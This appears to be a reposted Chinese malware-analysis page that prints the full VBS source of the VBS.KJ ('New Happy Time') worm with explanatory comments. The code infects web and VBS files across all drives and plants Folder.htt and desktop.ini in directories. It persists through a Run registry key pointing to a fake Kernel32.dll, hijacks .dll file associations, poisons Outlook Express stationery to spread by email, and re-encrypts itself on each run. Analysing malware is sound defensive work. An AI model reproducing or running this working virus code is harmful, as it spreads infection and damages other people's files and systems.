VBS.KJ[新欢乐时光]-源代码分析 作者：佚名  来源：不详  发布时间：2006-4-14 11:32:43  发布人：俺老虎 减小字体 增大字体 VBS.KJ[新欢乐时光] - 源代码分析'   Virus:  VBS.KJ'   Analyze by dancefire (DanceFire@263.net)'   2002/7/10'Dim InWhere,HtmlText,VbsText,DegreeSign,AppleObject,FSO,WsShell,WinPath,SubE,FinalyDiskSub KJ_start()    '   初始化变量 KJSetDim() '   初始化环境 KJCreateMilieu() '   感染本地或者共享上与html所在目录 KJLikeIt() '   通过vbs感染Outlook邮件模板 KJCreateMail() '   进行病毒传播 KJPropagate()End Sub'   函数：KJAppendTo(FilePath,TypeStr)'   功能：向指定类型的指定文件追加病毒'   参数：'       FilePath    指定文件路径'       TypeStr     指定类型Function KJAppendTo(FilePath,TypeStr) On Error Resume Next '   以只读方式打开指定文件 Set ReadTemp = FSO.OpenTextFile(FilePath,1) '   将文件内容读入到TmpStr变量中 TmpStr = ReadTemp.ReadAll '   判断文件中是否存在"KJ_start()"字符串，若存在说明已经感染，退出函数； '   若文件长度小于1，也退出函数。 If Instr(TmpStr,"KJ_start()") <> 0 Or Len(TmpStr) < 1 Then  ReadTemp.Close  Exit Function End If '   如果传过来的类型是"htt" '       在文件头加上调用页面的时候加载KJ_start()函数; '       在文件尾追加html版本的加密病毒体。 '   如果是"html" '       在文件尾追加调用页面的时候加载KJ_start()函数和html版本的病毒体; '   如果是"vbs" '       在文件尾追加vbs版本的病毒体 If TypeStr = "htt" Then  ReadTemp.Close  Set FileTemp = FSO.OpenTextFile(FilePath,2)  FileTemp.Write "<" & "BODY onload=""" & "vbscript:" & "KJ_start()""" & ">" & vbCrLf & TmpStr & vbCrLf & HtmlText  FileTemp.Close  Set FAttrib = FSO.GetFile(FilePath)  FAttrib.attributes = 34 Else  ReadTemp.Close  Set FileTemp = FSO.OpenTextFile(FilePath,8)  If TypeStr = "html" Then   FileTemp.Write vbCrLf & "<" & "HTML>" & vbCrLf & "<" & "BODY onload=""" & "vbscript:" & "KJ_start()""" & ">" & vbCrLf & HtmlText  ElseIf TypeStr = "vbs" Then   FileTemp.Write vbCrLf & VbsText  End If  FileTemp.Close End IfEnd Function'   函数：KJChangeSub(CurrentString,LastIndexChar)'   功能：改变子目录以及盘符'   参数：'       CurrentString   当前目录'       LastIndexChar   上一级目录在当前路径中的位置Function KJChangeSub(CurrentString,LastIndexChar)    '   判断是否是根目录 If LastIndexChar = 0 Then     '   如果是根目录     '       如果是C:\，返回FinalyDisk盘，并将SubE置为0，     '       如果不是C:\，返回将当前盘符递减1，并将SubE置为0  If Left(LCase(CurrentString),1) =< LCase("c") Then   KJChangeSub = FinalyDisk & ":\"   SubE = 0  Else   KJChangeSub = Chr(Asc(Left(LCase(CurrentString),1)) - 1) & ":\"   SubE = 0  End If Else     '   如果不是根目录，则返回上一级目录名称  KJChangeSub = Mid(CurrentString,1,LastIndexChar) End IfEnd Function'   函数：KJCreateMail()'   功能：感染邮件部分Function KJCreateMail() On Error Resume Next '   如果当前执行文件是"html"的，就退出函数 If InWhere = "html" Then  Exit Function End If '   取系统盘的空白页的路径 ShareFile = Left(WinPath,3) & "Program Files\Common Files\Microsoft Shared\Stationery\blank.htm" '   如果存在这个文件，就向其追加html的病毒体    '   否则生成含有病毒体的这个文件 If (FSO.FileExists(ShareFile)) Then  Call KJAppendTo(ShareFile,"html") Else  Set FileTemp = FSO.OpenTextFile(ShareFile,2,true)  FileTemp.Write "<" & "HTML>" & vbCrLf & "<" & "BODY onload=""" & "vbscript:" & "KJ_start()""" & ">" & vbCrLf & HtmlText  FileTemp.Close End If '   取得当前用户的ID和OutLook的版本 DefaultId = WsShell.RegRead("HKEY_CURRENT_USER\Identities\Default User ID") OutLookVersion = WsShell.RegRead("HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook Express\MediaVer") '   激活信纸功能，并感染所有信纸 WsShell.RegWrite "HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Compose Use Stationery",1,"REG_DWORD" Call KJMailReg("HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Stationery Name",ShareFile) Call KJMailReg("HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Wide Stationery Name",ShareFile) WsShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Outlook\Options\Mail\EditorPreference",131072,"REG_DWORD" Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings\0a0d020000000000c000000000000046\001e0360","blank") Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings\0a0d020000000000c000000000000046\001e0360","blank") WsShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Outlook\Options\Mail\EditorPreference",131072,"REG_DWORD" Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Common\MailSettings\NewStationery","blank") KJummageFolder(Left(WinPath,3) & "Program Files\Common Files\Microsoft Shared\Stationery")End Function' 函数:KJCreateMilieu()' 功能：创建系统环境Function KJCreateMilieu() On Error Resume Next TempPath = "" ' 判断操作系统是NT/2000还是9X If Not(FSO.FileExists(WinPath & "Wscript.exe")) Then  TempPath = "system32\" End If ' 为了文件名起到迷惑性，并且不会与系统文件冲突。 ' 如果是NT/2000则启动文件为system\Kernel32.dll ' 如果是9x启动文件则为system\Kernel.dll If TempPath = "system32\" Then  StartUpFile = WinPath & "SYSTEM\Kernel32.dll" Else  StartUpFile = WinPath & "SYSTEM\Kernel.dll" End If ' 添加Run值，添加刚才生成的启动文件路径 WsShell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Kernel32",StartUpFile '   拷贝前期备份的文件到原来的目录 FSO.CopyFile WinPath & "web\kjwall.gif",WinPath & "web\Folder.htt" FSO.CopyFile WinPath & "system32\kjwall.gif",WinPath & "system32\desktop.ini"    '   向%windir%\web\Folder.htt追加病毒体 Call KJAppendTo(WinPath & "web\Folder.htt","htt") '   改变dll的MIME头 '   改变dll的默认图标 '   改变dll的打开方式 WsShell.RegWrite "HKEY_CLASSES_ROOT\.dll\","dllfile" WsShell.RegWrite "HKEY_CLASSES_ROOT\.dll\Content Type","application/x-msdownload" WsShell.RegWrite "HKEY_CLASSES_ROOT\dllfile\DefaultIcon\",WsShell.RegRead("HKEY_CLASSES_ROOT\vxdfile\DefaultIcon\") WsShell.RegWrite "HKEY_CLASSES_ROOT\dllfile\scriptEngine\","VBscript" WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\Shell\Open\Command\",WinPath & TempPath & "Wscript.exe ""%1"" %*" WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\ShellEx\PropertySheetHandlers\WSHProps\","{60254CA5-953B-11CF-8C96-00AA00B8708C}" WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\scriptHostEncode\","{85131631-480C-11D2-B1F9-00C04F86C324}" '   启动时加载的病毒文件中写入病毒体 Set FileTemp = FSO.OpenTextFile(StartUpFile,2,true) FileTemp.Write VbsText FileTemp.CloseEnd Function'   函数：KJLikeIt()'   功能：针对html文件进行处理，如果访问的是本地的或者共享上的文件，将感染这个目录Function KJLikeIt()    '   如果当前执行文件不是"html"的就退出程序 If InWhere <> "html" Then  Exit Function End If '   取得文档当前路径 ThisLocation = document.location '   如果是本地或网上共享文件 If Left(ThisLocation, 4) = "file" Then  ThisLocation = Mid(ThisLocation,9)  '   如果这个文件扩展名不为空，在ThisLocation中保存它的路径  If FSO.GetExtensionName(ThisLocation) <> "" then   ThisLocation = Left(ThisLocation,Len(ThisLocation) - Len(FSO.GetFileName(ThisLocation)))  End If  '   如果ThisLocation的长度大于3就尾追一个"\"  If Len(ThisLocation) > 3 Then   ThisLocation = ThisLocation & "\"  End If  '   感染这个目录  KJummageFolder(ThisLocation) End IfEnd Function'   函数：KJMailReg(RegStr,FileName)'   功能：如果注册表指定键值不存在，则向指定位置写入指定文件名'   参数：'       RegStr      注册表指定键值'       FileName    指定文件名Function KJMailReg(RegStr,FileName) On Error Resume Next    '   如果注册表指定键值不存在，则向指定位置写入指定文件名 RegTempStr = WsShell.RegRead(RegStr) If RegTempStr = "" Then  WsShell.RegWrite RegStr,FileName End IfEnd Function'   函数：KJOboSub(CurrentString)'   功能：遍历并返回目录路径'   参数：'       CurrentString   当前目录Function KJOboSub(CurrentString) SubE = 0 TestOut = 0 Do While True  TestOut = TestOut + 1  If TestOut > 28 Then   CurrentString = FinalyDisk & ":\"   Exit Do  End If  On Error Resume Next  '   取得当前目录的所有子目录，并且放到字典中  Set ThisFolder = FSO.GetFolder(CurrentString)  Set DicSub = CreateObject("scripting.Dictionary")  Set Folders = ThisFolder.SubFolders  FolderCount = 0  For Each TempFolder in Folders   FolderCount = FolderCount + 1   DicSub.add FolderCount, TempFolder.Name  Next  '   如果没有子目录了，就调用KJChangeSub返回上一级目录或者更换盘符，并将SubE置1  If DicSub.Count = 0 Then   LastIndexChar = InstrRev(CurrentString,"\",Len(CurrentString)-1)   SubString = Mid(CurrentString,LastIndexChar+1,Len(CurrentString)-LastIndexChar-1)   CurrentString = KJChangeSub(CurrentString,LastIndexChar)   SubE = 1  Else  '   如果存在子目录  '       如果SubE为0，则将CurrentString变为它的第1个子目录   If SubE = 0 Then    CurrentString = CurrentString & DicSub.Item(1) & "\"    Exit Do   Else  '       如果SubE为1，继续遍历子目录，并将下一个子目录返回    j = 0    For j = 1 To FolderCount     If LCase(SubString) = LCase(DicSub.Item(j)) Then      If j < FolderCount Then       CurrentString = CurrentString & DicSub.Item(j+1) & "\"       Exit Do      End If     End If    Next    LastIndexChar = InstrRev(CurrentString,"\",Len(CurrentString)-1)    SubString = Mid(CurrentString,LastIndexChar+1,Len(CurrentString)-LastIndexChar-1)    CurrentString = KJChangeSub(CurrentString,LastIndexChar)   End If  End If Loop KJOboSub = CurrentStringEnd Function'   函数：KJPropagate()'   功能：病毒传播Function KJPropagate() On Error Resume Next RegPathValue = "HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook Express\Degree" DiskDegree = WsShell.RegRead(RegPathValue) '   如果不存在Degree这个键值，DiskDegree则为FinalyDisk盘 If DiskDegree = "" Then  DiskDegree = FinalyDisk & ":\" End If '   继DiskDegree置后感染5个目录 For i=1 to 5  DiskDegree = KJOboSub(DiskDegree)  KJummageFolder(DiskDegree) Next '   将感染记录保存在"HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook Express\Degree"键值中 WsShell.RegWrite RegPathValue,DiskDegreeEnd Function'   函数：KJummageFolder(PathName)'   功能：感染指定目录'   参数：'       PathName    指定目录Function KJummageFolder(PathName) On Error Resume Next '   取得目录中的所有文件集 Set FolderName = FSO.GetFolder(PathName) Set ThisFiles = FolderName.Files HttExists = 0 For Each ThisFile In ThisFiles  FileExt = UCase(FSO.GetExtensionName(ThisFile.Path))  '   判断扩展名  '       若是HTM,HTML,ASP,PHP,JSP则向文件中追加HTML版的病毒体  '       若是VBS则向文件中追加VBS版的病毒体  '       若是HTT,则标志为已经存在HTT了  If FileExt = "HTM" Or FileExt = "HTML" Or FileExt = "ASP" Or FileExt = "PHP" Or FileExt = "JSP" Then   Call KJAppendTo(ThisFile.Path,"html")  ElseIf FileExt = "VBS" Then   Call KJAppendTo(ThisFile.Path,"vbs")  ElseIf FileExt = "HTT" Then   HttExists = 1  End If Next '   如果所给的路径是桌面，则标志为已经存在HTT了 If (UCase(PathName) = UCase(WinPath & "Desktop\")) Or (UCase(PathName) = UCase(WinPath & "Desktop"))Then  HttExists = 1 End If '   如果不存在HTT '       向目录中追加病毒体 If HttExists = 0 Then  FSO.CopyFile WinPath & "system32\desktop.ini",PathName  FSO.CopyFile WinPath & "web\Folder.htt",PathName End IfEnd Function' 函数KJSetDim()'  定义FSO,WsShell对象'  取得最后一个可用磁盘卷标'  生成传染用的加密字串'  备份系统中的web\folder.htt和system32\desktop.iniFunction KJSetDim() On Error Resume Next Err.Clear ' 测试当前执行文件是html还是vbs TestIt = Wscript.scriptFullname If Err Then  InWhere = "html" Else  InWhere = "vbs" End If  ' 创建文件访问对象和Shell对象 If InWhere = "vbs" Then  Set FSO = CreateObject("scripting.FileSystemObject")  Set WsShell = CreateObject("Wscript.Shell") Else  Set AppleObject = document.applets("KJ_guest")  AppleObject.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}")  AppleObject.createInstance()  Set WsShell = AppleObject.GetObject()  AppleObject.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}")  AppleObject.createInstance()  Set FSO = AppleObject.GetObject() End If Set DiskObject = FSO.Drives ' 判断磁盘类型 ' ' 0: Unknown ' 1: Removable ' 2: Fixed ' 3: Network ' 4: CD-ROM ' 5: RAM Disk ' 如果不是可移动磁盘或者固定磁盘就跳出循环。可能作者考虑的是网络磁盘、CD-ROM、RAM Disk都是在比较靠后的位置。呵呵，如果C:是RAMDISK会怎么样？ For Each DiskTemp In DiskObject  If DiskTemp.DriveType <> 2 And DiskTemp.DriveType <> 1 Then   Exit For  End If  FinalyDisk = DiskTemp.DriveLetter Next  ' 此前的这段病毒体已经解密，并且存放在ThisText中，现在为了传播，需要对它进行再加密。 ' 加密算法 Dim OtherArr(3) Randomize ' 随机生成4个算子 For i=0 To 3  OtherArr(i) = Int((9 * Rnd)) Next TempString = "" For i=1 To Len(ThisText)  TempNum = Asc(Mid(ThisText,i,1))  '对回车、换行(0x0D,0x0A)做特别的处理  If TempNum = 13 Then   TempNum = 28  ElseIf TempNum = 10 Then   TempNum = 29  End If  '很简单的加密处理，每个字符减去相应的算子，那么在解密的时候只要按照这个顺序每个字符加上相应的算子就可以了。  TempChar = Chr(TempNum - OtherArr(i Mod 4))  If TempChar = Chr(34) Then   TempChar = Chr(18)  End If  TempString = TempString & TempChar Next ' 含有解密算法的字串 UnLockStr = "Execute(""Dim KeyArr(3),ThisText""&vbCrLf&""KeyArr(0) = " & OtherArr(0) & """&vbCrLf&""KeyArr(1) = " & OtherArr(1) & """&vbCrLf&""KeyArr(2) = " & OtherArr(2) & """&vbCrLf&""KeyArr(3) = " & OtherArr(3) & """&vbCrLf&""For i=1 To Len(ExeString)""&vbCrLf&""TempNum = Asc(Mid(ExeString,i,1))""&vbCrLf&""If TempNum = 18 Then""&vbCrLf&""TempNum = 34""&vbCrLf&""End If""&vbCrLf&""TempChar = Chr(TempNum + KeyArr(i Mod 4))""&vbCrLf&""If TempChar = Chr(28) Then""&vbCrLf&""TempChar = vbCr""&vbCrLf&""ElseIf TempChar = Chr(29) Then""&vbCrLf&""TempChar = vbLf""&vbCrLf&""End If""&vbCrLf&""ThisText = ThisText & TempChar""&vbCrLf&""Next"")" & vbCrLf & "Execute(ThisText)" ' 将加密好的病毒体复制给变量 ThisText ThisText = "ExeString = """ & TempString & """" ' 生成html感染用的脚本 HtmlText ="<" & "script language=vbscript>" & vbCrLf & "document.write " & """" & "<" & "div style='position:absolute; left:0px; top:0px; width:0px; height:0px; z-index:28; visibility: hidden'>" & "<""&""" & "APPLET NAME=KJ""&""_guest HEIGHT=0 WIDTH=0 code=com.ms.""&""activeX.Active""&""XComponent>" & "<" & "/APPLET>" & "<" & "/div>""" & vbCrLf & "<" & "/script>" & vbCrLf & "<" & "script language=vbscript>" & vbCrLf & ThisText & vbCrLf & UnLockStr & vbCrLf & "<" & "/script>" & vbCrLf & "<" & "/BODY>" & vbCrLf & "<" & "/HTML>" ' 生成vbs感染用的脚本 VbsText = ThisText & vbCrLf & UnLockStr & vbCrLf & "KJ_start()" ' 取得Windows目录 ' GetSpecialFolder(n) '  0: WindowsFolder '  1: SystemFolder '  2: TemporaryFolder ' 如果系统目录存在web\Folder.htt和system32\desktop.ini，则用kjwall.gif文件名备份它们。 WinPath = FSO.GetSpecialFolder(0) & "\" If (FSO.FileExists(WinPath & "web\Folder.htt")) Then  FSO.CopyFile WinPath & "web\Folder.htt",WinPath & "web\kjwall.gif" End If If (FSO.FileExists(WinPath & "system32\desktop.ini")) Then  FSO.CopyFile WinPath & "system32\desktop.ini",WinPath & "system32\kjwall.gif" End IfEnd Function

评论